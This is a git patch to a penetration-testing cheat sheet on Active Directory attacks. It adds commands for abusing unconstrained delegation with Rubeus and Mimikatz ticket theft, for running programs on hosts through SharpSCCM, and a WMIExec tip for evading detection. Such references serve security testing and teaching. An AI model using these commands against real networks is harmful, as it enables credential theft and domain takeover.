From ae46ac03380958af2c44c3a81a2d56a6759802c7 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 15 Feb 2023 12:33:20 +0100 Subject: [PATCH] WMIExec + SharpSCCM --- .../Active Directory Attack.md | 18 ++++++++++++++++-- .../Windows - Using credentials.md | 6 ++++++ 2 files changed, 22 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 14d410a..a1a3828 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -3422,6 +3422,9 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma :warning: Unconstrained delegation used to be the only option available in Windows 2000 +> **Warning** +> Remember to coerce to a HOSTNAME if you want a Kerberos Ticket + #### SpoolService Abuse with Unconstrained Delegation The goal is to gain DC Sync privileges using a computer account and the SpoolService bug. @@ -3436,7 +3439,7 @@ The goal is to gain DC Sync privileges using a computer account and the SpoolSer ##### Find delegation :warning: : Domain controllers usually have unconstrained delegation enabled. -Check the `TrustedForDelegation` property. +Check the `TRUSTED_FOR_DELEGATION` property. * [ADModule](https://github.com/samratashok/ADModule) ```powershell @@ -3455,6 +3458,9 @@ Check the `TrustedForDelegation` property. cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation ``` +* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c` +* Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl` + ##### SpoolService status Check if the spool service is running on the remote host @@ -3499,7 +3505,7 @@ If the attack worked you should get a TGT of the domain controller. Extract the base64 TGT from Rubeus output and load it to our current session. ```powershell -.\Rubeus.exe asktgs /ticket: /ptt +.\Rubeus.exe asktgs /ticket: /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt ``` Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets` @@ -3768,6 +3774,13 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th * [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) * [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) + +* Using **SharpSCCM** + ```ps1 + .\SharpSCCM.exe get device --server --site-code + .\SharpSCCM.exe exec -d -r + .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug + ``` * Compromise client, use locate to find management server ```ps1 MalSCCM.exe locate @@ -3838,6 +3851,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th ConvertFrom-SddlString "" ``` + ### SCCM Shares > Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index dc1644c..549f8ea 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -10,6 +10,7 @@ * [Crackmapexec](#crackmapexec) * [Impacket](#impacket) * [PSExec](#psexec) + * [WMIExec](#wmiexec) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [Powershell Remoting Protocol](#powershell-remoting-protocol) @@ -162,6 +163,11 @@ Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCu You need to update the pipe name to match "Custom_communication" in the line 163 `fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)` +### WMIExec + +Use a non default share `-share SHARE` to write the output to reduce the detection. +By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1` + ## RDP Remote Desktop Protocol